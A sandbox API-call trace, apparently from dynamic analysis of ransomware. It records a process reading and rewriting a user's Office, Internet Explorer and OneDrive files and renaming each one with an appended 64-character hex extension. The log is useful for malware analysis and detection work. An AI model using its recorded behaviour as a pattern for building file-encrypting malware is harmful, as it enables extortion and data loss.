lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml", lpString2=".CA74F08F019FDBE2512A43C4BA8EF92D79647233582E5A64A42B9645AC790C7D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml.CA74F08F019FDBE2512A43C4BA8EF92D79647233582E5A64A42B9645AC790C7D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml.CA74F08F019FDBE2512A43C4BA8EF92D79647233582E5A64A42B9645AC790C7D" [0111.144] GetProcessHeap () returned 0x600000 [0111.144] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x178) returned 0x6ed9f8 [0111.144] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x2c7ff60, FileInformation=0x6ed9f8, Length=0x178, FileInformationClass=0xa) returned 0x0 [0111.145] CloseHandle (hObject=0x310) returned 1 [0111.147] GetProcessHeap () returned 0x600000 [0111.147] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0111.147] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.149] WriteFile (in: hFile=0x31c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0111.149] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.290] ReadFile (in: hFile=0x32c, lpBuffer=0x680470, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0111.291] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.291] WriteFile (in: hFile=0x32c, lpBuffer=0x680470, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 0x0 [0111.292] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.298] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x2c7ff70) returned 0x0 [0111.299] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml", lpString2=".34FCB489563D3DBF4D8B74585FF0FF5D8DD9DEA074CE8CF7B0E01022C2D49554" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml.34FCB489563D3DBF4D8B74585FF0FF5D8DD9DEA074CE8CF7B0E01022C2D49554") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml.34FCB489563D3DBF4D8B74585FF0FF5D8DD9DEA074CE8CF7B0E01022C2D49554" [0111.299] GetProcessHeap () returned 0x600000 [0111.299] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16c) returned 0x6f4808 [0111.299] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2c7ff60, FileInformation=0x6f4808, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0111.300] CloseHandle (hObject=0x32c) returned 1 [0111.302] GetProcessHeap () returned 0x600000 [0111.302] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0111.303] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.312] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0111.312] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml", lpString2=".801FDEC0B61644273809F6887BAF72A0357525716D4BB5D88D7DE268D24BC41A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml.801FDEC0B61644273809F6887BAF72A0357525716D4BB5D88D7DE268D24BC41A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml.801FDEC0B61644273809F6887BAF72A0357525716D4BB5D88D7DE268D24BC41A" [0111.312] GetProcessHeap () returned 0x600000 [0111.312] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x15c) returned 0x311b290 [0111.312] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x2c7ff60, FileInformation=0x311b290, Length=0x15c, FileInformationClass=0xa) returned 0x0 [0111.314] CloseHandle (hObject=0x328) returned 1 [0111.318] GetProcessHeap () returned 0x600000 [0111.318] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.319] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.322] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x32a00f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x32a00f8, ReturnLength=0x2c7ff70) returned 0x0 [0111.322] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml", lpString2=".6354C0804F150AACCF920416ED8610FA1015A8456A191DA56A57BABB60BFE361" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml.6354C0804F150AACCF920416ED8610FA1015A8456A191DA56A57BABB60BFE361") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml.6354C0804F150AACCF920416ED8610FA1015A8456A191DA56A57BABB60BFE361" [0111.322] GetProcessHeap () returned 0x600000 [0111.322] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x15e) returned 0x311b3f8 [0111.322] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x2c7ff60, FileInformation=0x311b3f8, Length=0x15e, FileInformationClass=0xa) returned 0x0 [0111.323] CloseHandle (hObject=0x318) returned 1 [0111.327] GetProcessHeap () returned 0x600000 [0111.327] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0048 | out: hHeap=0x600000) returned 1 [0111.328] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.480] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0111.480] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTeleMediumCost.dat", lpString2=".6AFFF073814879A89FADC5E0421C75EB91ED56E3D66683AF87CCAEC51934970F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTeleMediumCost.dat.6AFFF073814879A89FADC5E0421C75EB91ED56E3D66683AF87CCAEC51934970F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTeleMediumCost.dat.6AFFF073814879A89FADC5E0421C75EB91ED56E3D66683AF87CCAEC51934970F" [0111.480] GetProcessHeap () returned 0x600000 [0111.480] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1da) returned 0x6f3698 [0111.480] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x6f3698, Length=0x1da, FileInformationClass=0xa) returned 0x0 [0111.484] CloseHandle (hObject=0x334) returned 1 [0111.486] GetProcessHeap () returned 0x600000 [0111.486] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.487] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.489] WriteFile (in: hFile=0x330, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0111.490] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.501] WriteFile (in: hFile=0x330, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0111.502] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.522] WriteFile (in: hFile=0x330, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0111.522] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.795] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0111.795] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png", lpString2=".767D75C9248D2E28A9820017F73ACC430B259FEF7044D0D208154456128B3F38" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png.767D75C9248D2E28A9820017F73ACC430B259FEF7044D0D208154456128B3F38") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png.767D75C9248D2E28A9820017F73ACC430B259FEF7044D0D208154456128B3F38" [0111.795] GetProcessHeap () returned 0x600000 [0111.795] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x6f44a0 [0111.796] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x2c7ff60, FileInformation=0x6f44a0, Length=0x170, FileInformationClass=0xa) returned 0x0 [0111.806] CloseHandle (hObject=0x330) returned 1 [0111.811] GetProcessHeap () returned 0x600000 [0111.811] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.813] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.832] ReadFile (in: hFile=0x328, lpBuffer=0x6a85c8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490) returned 1 [0111.832] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.833] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x688540, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x688540, ReturnLength=0x2c7ff70) returned 0x0 [0111.834] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.LocalizedResources.dll", lpString2=".ECCB7093E0B0C3E67B667BEBDDD7EB89C9DE058707B074566BBD29DF4D278707" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.LocalizedResources.dll.ECCB7093E0B0C3E67B667BEBDDD7EB89C9DE058707B074566BBD29DF4D278707") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.LocalizedResources.dll.ECCB7093E0B0C3E67B667BEBDDD7EB89C9DE058707B074566BBD29DF4D278707" [0111.834] GetProcessHeap () returned 0x600000 [0111.834] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x3185f60 [0111.834] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x2c7ff60, FileInformation=0x3185f60, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0111.837] CloseHandle (hObject=0x328) returned 1 [0111.841] GetProcessHeap () returned 0x600000 [0111.841] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0111.842] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.921] ReadFile (in: hFile=0x334, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.921] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.923] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x2c7ff70) returned 0x0 [0111.923] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncApi.dll", lpString2=".E76705295DFE1132012760ACB42CC6102F0A9D52744D6336D1A8F52D240F8929" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncApi.dll.E76705295DFE1132012760ACB42CC6102F0A9D52744D6336D1A8F52D240F8929") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncApi.dll.E76705295DFE1132012760ACB42CC6102F0A9D52744D6336D1A8F52D240F8929" [0111.924] GetProcessHeap () returned 0x600000 [0111.924] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16c) returned 0x31860f8 [0111.924] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x31860f8, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0111.934] CloseHandle (hObject=0x334) returned 1 [0111.940] GetProcessHeap () returned 0x600000 [0111.940] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.940] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.944] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x2c7ff70) returned 0x0 [0111.945] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml", lpString2=".5C17BC5C69CE29DBD1A6AAD2E394398F310BEB159AC340F413409A035172BB4D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml.5C17BC5C69CE29DBD1A6AAD2E394398F310BEB159AC340F413409A035172BB4D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml.5C17BC5C69CE29DBD1A6AAD2E394398F310BEB159AC340F413409A035172BB4D" [0111.945] GetProcessHeap () returned 0x600000 [0111.945] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x3186270 [0111.946] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x2c7ff60, FileInformation=0x3186270, Length=0x170, FileInformationClass=0xa) returned 0x0 [0111.947] CloseHandle (hObject=0x310) returned 1 [0111.952] GetProcessHeap () returned 0x600000 [0111.952] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0111.953] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.266] ReadFile (in: hFile=0x334, lpBuffer=0x680470, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0112.266] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.268] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x2c7ff70) returned 0x0 [0112.268] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\CollectOneDriveLogs.bat", lpString2=".EED800DD2B41B55DD2584F0A5165A6F17B0F3743BF9BB9B324D84E4DF29C9176" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\CollectOneDriveLogs.bat.EED800DD2B41B55DD2584F0A5165A6F17B0F3743BF9BB9B324D84E4DF29C9176") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\CollectOneDriveLogs.bat.EED800DD2B41B55DD2584F0A5165A6F17B0F3743BF9BB9B324D84E4DF29C9176" [0112.269] GetProcessHeap () returned 0x600000 [0112.269] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x63bba8 [0112.269] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x63bba8, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0112.269] CloseHandle (hObject=0x334) returned 1 [0112.270] GetProcessHeap () returned 0x600000 [0112.270] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0112.270] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.341] WriteFile (in: hFile=0x328, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.345] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.835] ReadFile (in: hFile=0x318, lpBuffer=0x6a85c8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490) returned 1 [0112.836] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.836] WriteFile (in: hFile=0x318, lpBuffer=0x6a85c8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490) returned 1 [0112.837] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.838] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x688540, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x688540, ReturnLength=0x2c7ff70) returned 0x0 [0112.838] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SyncEngine.dll", lpString2=".10F62F251928B4270FC9D26C05EC3A3B324F7FA2BE42E17C48EC8DB422536900" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SyncEngine.dll.10F62F251928B4270FC9D26C05EC3A3B324F7FA2BE42E17C48EC8DB422536900") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SyncEngine.dll.10F62F251928B4270FC9D26C05EC3A3B324F7FA2BE42E17C48EC8DB422536900" [0112.838] GetProcessHeap () returned 0x600000 [0112.838] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16a) returned 0x3186410 [0112.838] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x2c7ff60, FileInformation=0x3186410, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0112.839] CloseHandle (hObject=0x318) returned 1 [0112.840] GetProcessHeap () returned 0x600000 [0112.840] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0112.841] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.848] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.849] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.849] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, 